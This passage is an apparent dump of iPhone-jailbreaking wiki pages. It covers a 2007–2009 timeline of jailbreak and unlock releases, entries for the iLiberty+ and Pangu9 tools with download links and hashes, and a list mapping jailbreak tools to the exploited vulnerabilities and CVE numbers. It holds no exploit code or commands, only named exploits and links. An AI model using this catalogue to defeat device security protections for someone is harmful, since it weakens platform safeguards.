* 31 January -- The [[iPhone Dev Team]] released [[redsn0w Lite]], a [[tethered jailbreak|tethered]] [[N72AP|iPod touch (2nd generation)]] [[jailbreak]]. It combines the [[ARM7 Go]] vulnerability with the well-established [[pwnage]] flow for other Apple mobile devices. It was bundled in a way that allowed usage on [[iOS|iPhone OS]] 2.2.1 by uploading [[iBoot (Bootloader)|iBoot]] from [[iOS|iPhone OS]] 2.1.1, which is vulnerable to [[ARM7 Go]], to the device while in [[DFU Mode]].
* 29 January -- Apple releases [[iOS|iPhone OS]] 2.2.1, closing the [[AT+stkprof]] exploit.
* 25 January -- [[0wnboot]] is released to [http://code.google.com/p/chronicdev/ chronicdev google code page], thanks to [[AriX]], [[User:ChronicDev|chronic]], [[CPICH]], [[westbaer]], [[ius]], [[User:Pod2g|pod2g]], the rest of the iPod devel crew on IRC, and to the #iphone-hax lab rats. Within days, [[AriX]] and the [[Chronic Dev (team)|Chronic Dev Team]] got a ramdisk booting for a [[tethered jailbreak]].
* 17 January -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] [https://twitter.com/MuscleNerd/status/1127346766 shows a video demo] of the first jailbroken [[N72AP|iPod touch (2nd generation)]].
* 16 January -- [[ARM7 Go]] vulnerability disclosed where else but here on The iPhone Wiki, for developers to poke and prod at.
* 15 January -- The [[iPhone Dev Team]] [https://twitter.com/iphone_dev/status/1120595069 tweets the VFDecrypt key] for [[iOS|iPhone OS]] 2.2 on [[N72AP|iPod touch (2nd generation)]], demonstrating for the first time that unsigned code can now be run on that device.
* 1 January -- The [[iPhone Dev Team]] releases [[yellowsn0w]] 0.9 beta for baseband [[02.28.00]].

== 2008 ==
=== December ===
* 27 December -- [[25C3 presentation "Hacking the iPhone"]]
* 21 December -- [[User:MuscleNerd|MuscleNerd]], of the [[iPhone Dev Team]] does a live demo of the 3G unlock, dubbed as [[yellowsn0w]]: http://qik.com/video/729275

=== November ===
* 21 November -- Apple releases [[iOS|iPhone OS]] 2.2.

=== September ===
* 9 September -- Apple releases [[iOS|iPhone OS]] 2.1. [[N72AP|iPod touch (2nd generation)]], which no longer had the [[Pwnage 2.0]] exploit, is revealed.

=== August ===
* 18 August -- Apple releases [[iOS|iPhone OS]] 2.0.2. [[iPhone Dev Team]] releases [http://wikee.iphwn.org/news:pwnage20announcement QuickPwn], a 2.x [[pwnage]]/ramdisk combination exploit that allows jailbreaking without needing to create custom IPSWs.
* 4 August -- Apple releases [[iOS|iPhone OS]] 2.0.1.

=== July ===
* 22 July -- [[TA_Mobile]] hardware dumps the 3G baseband (bootloader 5.8 & FW 1.45.00) by desoldering the [[NOR]].
* 19 July -- [[iPhone Dev Team]] releases [[PwnageTool]] 2.0, jailbreaking and unlocking the 2.0 software on the [[M68AP|iPhone]] and jailbreaking [[iOS|iPhone OS]] 2.0 on the [[N82AP|iPhone 3G]] and [[N45AP|iPod touch]].
* 15 July -- Apple releases [[iOS|iPhone OS]] 1.1.5 for the [[N45AP|iPod touch]].
* 11 July -- [[N82AP|iPhone 3G]] is released. Apple also releases [[iOS|iPhone OS]] 2.0 and MobileMe on the same date, resulting in server issues.

=== June ===
* 9 June - [[N82AP|iPhone 3G]] is announced at [[WWDC]] '08.

=== April ===
* 3 April -- [[iPhone Dev Team]] releases [[PwnageTool]] 1.0, making use of the [[pmdx exploit]] (to patch RSA checks out of the [[kernel]], to write unsigned to [[NOR]])

=== March ===
* 12 March -- [[iPhone Dev Team]] releases dual-boot jailbreak method, only to be silently fixed in 2.0.
* 4 March -- [[User:n0b|George Zhu (n000b)]] releases [[iLiberty+|iLiberty / iLiberty+]].

=== February ===
* 28 February -- [[Cydia Application|Cydia]] is released as an open-source alternative to [[Installer.app]], and prepares to take over the jailbreak application scene upon 2.0's release.
* 26 February -- Apple releases [[iOS|iPhone OS]] 1.1.4.
* 11 February -- [[User:Zibri|Zibri]] leaks the [[Ramdisk Hack]] in [[ZiPhone]], the first all-in-one unlock, activate, jailbreak solution.
* 8 February -- [[User:Geohot|geohot]] releases software unlock for 4.6. Apple states 25% of phones were never activated with AT&T.

=== January ===
* 28 January -- [[iPhone Dev Team]] releases [[Soft Upgrade]] jailbreak for 1.1.3.
* 24 January -- [[Nate True]] releases a version of [[iBrickr]] that used the [[Soft Upgrade]] method to jailbreak 1.1.3.
* 18 January -- [[User:Geohot|Geohot]] and his friends [http://iphonejtag.blogspot.com/2008/01/112-otb-unlocked.html unlocked 1.1.2 OTB 4.6 by test point], the unbeatable version at that time.
* 18 January -- [[iPhone Dev Team]] posts YouTube video of a jailbroken 1.1.3, which was made possible by the dual boot jailbreak from [[bgm]].
* 15 January -- Apple releases [[iOS|iPhone OS]] 1.1.3, closing the [[mknod]] exploit. In addition, everything now runs as "mobile" instead of "root."

== 2007 ==
=== November ===
* 15 November -- [[Baseband Bootloader|Baseband bootloader]] 4.6 is found on new [[M68AP|iPhone]] devices, which initially had no [[unlock]].
* 12 November -- Apple releases [[iOS|iPhone OS]] 1.1.2, closing the [[LibTiff]] and [[Symlinks]] exploits.
* 2 November -- [[JailbreakMe|AppSnapp]] is released, bringing jailbreaking to the mainstream iPhone user.

=== October ===
* 23 October -- iPhone-Elite Team releases the [[Virginizer]].
* 14 October -- [[User:AriX|AriX]] releases iJailBreak, the first automated [[N45AP|iPod touch]] jailbreak for the Mac.
* 12 October -- [[User:planetbeing|planetbeing]] releases [[touchFree]], the first automated [[N45AP|iPod touch]] [[jailbreak]].
* 10 October -- [[cmw]] (aka Niacin) and Dre release the LibTiff exploit to jailbreak the [[N45AP|iPod touch]], which is later adapted for use in [[JailbreakMe|AppSnapp]].

=== September ===
* 27 September -- Apple releases [[iOS|iPhone OS]] 1.1.1.
* 11 September -- [[iPhone Dev Team]] releases [[iUnlock]], first free software unlock.
* 10 September -- [[IPSF]] releases first paid software unlock.
* 9 September -- Apple announces the [[N45AP|iPod touch]] at a media event.

=== August ===
* 23 August -- [[User:Geohot|geohot]] and team release [[hardware unlock]] method.
* 21 August -- [[Installer.app]] is released by Nullriver, first GUI apps are distributed.

=== July ===
* 23 July -- First phones are used with other carriers by means of [[SIM hacks]].
* 20 July -- nightwatch adapts a [[toolchain]] to the iPhone. The first apps are compiled.
* 9 July -- [[iPhone Dev Team]] releases a [[jailbreak]] method. The first use of this is ringtones.
* 3 July -- DVD Jon first cracks [[activation]]. People can use the apps on the phone without a subscription.

=== June ===
* 29 June -- [[M68AP|iPhone]] is released. World's most hyped consumer product.
* 26 June -- The [[iPhone Dev Team]] was formed.

=== January ===
* 9 January -- [[M68AP|iPhone]] is announced on stage by Steve Jobs.

ILiberty+

2020-12-03T18:12:23Z

Inflatable Man: Dead link

{{lowercase}}
iLiberty+ is a universal GUI tool to jailbreak, activate and as unlock firmwares 1.1.4 and earlier. It also has some extra functionalities.

iLiberty was first developed as a personal tool for [http://george.insideiphone.com/ George Zhu] himself. However, it later integrated iPlus (a CLI utility developed by AViegas) and became a public tool, and its name was changed to iLiberty+.

Features of iLiberty+ include:

* Full range of iPhone hacking, including but not limited to jailbreaking, activation, unlocking, 3rd party application installation, etc.
* Fully script-driven, allow unlimited external payloads
* iPod touch support (jailbreak and application installation)
* Directly download missing payloads in GUI
* Proxy support for payloads download
* Support both Installer and Cydia
* Automatic online update

iLiberty+ is available on both Windows as well as Mac OS X (named iLibertyX). The main developers are George Zhu, AViegas, francis, and pepijin, with help from many others within the community.

==External Links==
* [https://web.archive.org/web/20120101122455/http://iliberty.insideiphone.com/Setup/iLibertySetup_1.3.0.113.exe iLiberty 1.3.0 for Windows]
* [https://web.archive.org/web/20170226073503/http://modmyi.com/files/iLibertyX.dmg Archive of iLibertyX for Mac OSX hosted by modmyi]

[[Category:Hacking Software]]
[[Category:Jailbreaks]]
[[Category:Jailbreaking]]

Pangu9

2020-12-03T17:30:03Z

Inflatable Man: Link is down so a web archive link is used

{{Infobox software
| name = Pangu9
| title = Pangu9
| screenshot = [[File:Pangu9.png|355px]]
| caption = Pangu9 v1.0.0 on Windows
| author = Pangu Team
| developer = Pangu Team
| released = {{Start date|2015|10|14|df=yes}}
| discontinued =
| latest release version = 1.3.2 (Windows) / {{Start date and age|2016|08|18|df=yes}} 1.1.1 (OS X) / {{Start date and age|2016|03|16|df=yes}} 1.0.0 (Apple TV 4) / {{Start date and age|2016|03|23|df=yes}}
| latest release date =
| latest preview version =
| latest preview date =
| programming language = [[wikipedia:C (programming language)|C]]
| operating system = [[wikipedia:Microsoft Windows|Windows]] / [[wikipedia:OS X|OS X]] / [[wikipedia:TvOS|tvOS]]
| size =
| platform = [[wikipedia:Microsoft Windows|Windows]] / [[wikipedia:OS X|OS X]] / [[wikipedia:TvOS|tvOS]]
| language = [[wikipedia:English language|English]]
| status = Active
| genre = Jailbreaking
| license = [[wikipedia:Freeware|Freeware]]
| website = [http://en.pangu.io en.pangu.io] (English)
}}

'''Pangu9''' is the name for a series of [[jailbreak]]s for all devices on iOS 9.0 through 9.1 ([[untethered jailbreak|untethered]]), 9.2 through 9.3.3 on 64-bit devices ([[semi-untethered jailbreak|semi-untethered]]) and [[J42dAP|Apple TV HD]] running tvOS 9.0 - 9.0.1 ([[untethered jailbreak|untethered]]).

The initial version was released on 14 October 2015 and supported iOS 9.0 through 9.0.2, [[untethered jailbreak|untethered]]. On 11 March 2016, Pangu9 1.3.0 (Windows)/1.1.0 (Mac) was released to jailbreak iOS 9.1 [[untethered jailbreak|untethered]] on 64-bit devices.

On 23 March 2016, Pangu released an [[untethered jailbreak]] for [[tvOS]] 9.0 through 9.0.1.

On 24 July 2016, a new version which jailbreaks [[semi-untethered jailbreak|semi-untethered]] iOS 9.2 through 9.3.3 was released on [http://www.pangu.io/?flag=cn Pangu's Chinese site]. An English version was released on [http://en.pangu.io Pangu's English site] a few days later on July 29.

On 19 August 2016, an [http://www.iphonehacks.com/2016/08/install-ios-9-3-3-pangu-jailbreak-using-safari.html on-device jailbreak] was released.

== Download ==
=== Pangu9 for iOS 9.0-9.1 ===
==== Windows ====
{| class="wikitable"
! Version
! SHA-1 Hash
! Download
! Changes
|-
| 1.0.0
| <code>c48e1c1f84c1d5ff6046cc4eb7344335b314ba4b</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.0.0.exe 25PP]
|
*Initial release
|-
| 1.0.1
| <code>05a0727085de1dd60eb4ec3a7bc343dd317d55d5</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.0.1.exe 25PP]
|
* Fixed a bug that leads to 0A error code.
* Fixed failure of launching on some PCs.
* Improved success rate.
* Ensure the removal of the Pangu app.
|-
| 1.1.0
| <code>1467a5a792186f157e11ed4d3b243aea80d95a40</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.1.0.exe 25PP]
|
* Improve the success rate and reliability of jailbreak program for 64bit devices
* Optimize backup process and improve jailbreak speed, and fix an issue that leads to fail to jailbreak due to low disk space in Windows.
* Fix a bug that leads to an exit of the jailbreak tool due to abnormal network status.
* Add the re-jailbreak function (only for some devices that were upgraded via iTunes but were detected as jailbroken)
* Fix a bug that leads to fail to use the instrument function in Xcode.
|-
| 1.2.0
| <code>2f5fae088e7c1b1058ab4dda826d9cab21d6f57d</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.2.0.exe 25PP]
|
* Bundle latest Cydia with new Patcyh which fixed failure to open url scheme in MobileSafari
* Fixed the bug that “preferences -> Storage&iCloud Usage -> Manage Storage” keeps spinning
|-
| 1.3.0
| <code>de1eee0d34fea80f6f798e722614a55b74590b4d</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.0.exe 25PP]
|
* Add support for iOS 9.1 devices (64bit only)
|-
| 1.3.1
| <code>c1af8b5ff94b28007b8b1523bf297423413659fe</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.1.exe 25PP]
|
* Make untether of iOS 9.1 more stable
|-
| 1.3.2
| <code>9a88b81c92eebccf8b059eafb5c2bacb169024bc</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_v1.3.2.exe 25PP]
|
* ?
|}

==== Mac ====
{| class="wikitable"
! Version
! SHA-1 Hash
! Download
! Changes
|-
| 1.0.0
| <code>3ab73c9c9b91b0dab97f071f1ac179d198ca90f6</code>
| [http://dl.pangu.25pp.com/jb/pangu9_mac_v1.0.0.dmg 25PP]
| Initial version
|-
| 1.1.0
| <code>6291c1906f80b9e655ebaf5bbddc388e0636509a</code>
| [http://dl.pangu.25pp.com/jb/pangu9_mac_v1.1.0.dmg 25PP]
| Add support for iOS 9.1 devices (64-bit devices only)
|-
| 1.1.1
| <code>9b2d03542383b5b4686c8593143eb15ddd4bc740</code>
| [https://web.archive.org/web/20180826065722/http://dl.pangu.25pp.com/jb/pangu9_mac_v1.1.1.dmg Archive of 25PP]
| Make the iOS 9.1 untether more stable
|}

=== Pangu9 for tvOS 9.0 - 9.1 (Apple TV) ===
{| class="wikitable"
! Version
! SHA-1 Hash
! Download
! Changes
|-
| 1.0.0
| <code>e87b4afaee4a91cb8e300b8976a03f414ed788da</code>
| [http://dl.pangu.25pp.com/jb/Pangu9_ATV_v1.0.zip 25PP]
| Initial version
|}

=== Pangu9 for iOS 9.2 - 9.3.3 ===
==== IPA ====
{| class="wikitable"
! Version
! MD5 Hash
! SHA-1 Hash
! Download
! Changes
|-
| 1.0
| <code>fe77f02db26b9d3d142ee1f343a6fdbb</code>
| <code>ab334937cd7bb7077eac25b223bd3784e8dcd7b7</code>
| [http://dl.pangu.25pp.com/jb/NvwaStone_1.0.ipa 25PP]
| Initial version
|-
| 1.1
| <code>34c6b2ff4d21b6bf29f16d1793db8fd5 </code>
| <code>e12cda775b8b8764e100eb7e6217b8ed7637ef20</code>
| [http://dl.pangu.25pp.com/jb/NvwaStone_1.1.ipa 25PP]
| Ability to use Pangu's expired Enterprise certificate, which lasts until April 2017
|}

== Name ==
"Pangu" is the name of the "[[wikipedia:Pangu|the first living being and the creator of all in some versions of Chinese mythology]]".

The 9.0-9.1 untether is nicknamed "Fuxi Qin". This continues the tradition of Chinese mythology from the previous jailbreaks (Pangu Axe, XuanYuan Sword), by referring to the instrument (琴) carried by the legendary emperor Fuxi (伏羲)

== See Also ==
*[[jbme|JailbreakMe for iOS 9.2-9.3.3]]

[[Category:Jailbreaks]]
[[Category:Jailbreaking]]

Jailbreak Exploits

2020-11-29T22:28:26Z

Inflatable Man: Added Odyssey's exploit information

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2
